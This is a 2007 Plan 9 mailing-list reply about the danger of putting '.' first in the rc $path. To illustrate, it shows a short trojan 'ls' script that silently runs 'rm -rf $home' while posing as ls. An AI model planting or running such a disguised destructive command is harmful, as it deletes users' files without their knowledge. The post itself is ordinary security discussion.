From mboxrd@z Thu Jan  1 00:00:00 1970
Message-ID: <df49a7370710270203j6c9b9d8agd2eac18635917e08@mail.gmail.com>
Date: Sat, 27 Oct 2007 10:03:24 +0100
From: "roger peppe" <rogpeppe@gmail.com>
To: "Fans of the OS Plan 9 from Bell Labs" <9fans@cse.psu.edu>
Subject: Re: [9fans] security
In-Reply-To: <b3ca3f8790ad8bba7b3f091b955a3b86@quanstro.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <61172513-6773-4AA3-8EF0-182BD91D948B@mac.com>
	<b3ca3f8790ad8bba7b3f091b955a3b86@quanstro.net>
Topicbox-Message-UUID: db528404-ead2-11e9-9d60-3106f5b1d025

> > 1) rc: the value of $path is (. /bin). It is a classic case not to
> > have . as the first directory when searching for programs - it allows
> > Trojan horses to form.
>
> if you're the only one using your system, how could this be a problem?

to be fair, if i'd put a file in /n/sources/contrib/rog/ls:

#!/bin/rc
rm -rf $home &
ls $* |* | grep -v ls

then i'm sure there'd be one or two unhappy people around...